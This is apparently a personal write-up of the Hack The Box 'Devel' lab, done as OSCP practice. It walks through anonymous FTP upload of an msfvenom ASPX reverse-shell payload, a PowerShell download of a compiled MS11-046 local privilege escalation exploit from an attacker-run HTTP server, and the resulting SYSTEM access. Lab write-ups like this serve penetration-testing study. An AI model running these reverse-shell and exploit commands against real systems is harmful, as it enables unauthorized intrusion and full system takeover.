Devel

Process

21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5

Went through a lot of exploits, Ethernal blue, iis ftp server attack, none worked

Then realise ftp allow uploading file, then generate payload via [[msfvenom]]: IIS accepts aspx msfvenom -p windows/meterpreter/reverse_tcp LHOST=$HOST LPORT=4444 -f aspx > exploit.aspx But doesn't work with nc listener

Realised because the paylaod is a meterpreter payload, which is not allowed in oscp exam but not compatible with nc listener...

Then use:

msfvenom -p windows/shell_reverse_tcp LHOST=$HOST LPORT=4444 -f aspx > exploit.aspx

Access denied. I am iis apppool/web 

c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          28/8/2022, 7:21:01 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1

Look for Win 7 exploits, found this: https://www.exploit-db.com/exploits/40564

i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32

Set up http server here in kali, then in powershell of the victim: powershell -c (New-Object Net.WebClient).DownloadFile('http://10.10.14.8/MS11-046.exe', 'exploit.exe')

Got SYSTEM

Takeaway

  1. Should have tested whether we can put file to ftp server first

  2. IIS server accepts .aspx/ .asp

PreviousOptimumNextBeep

Last updated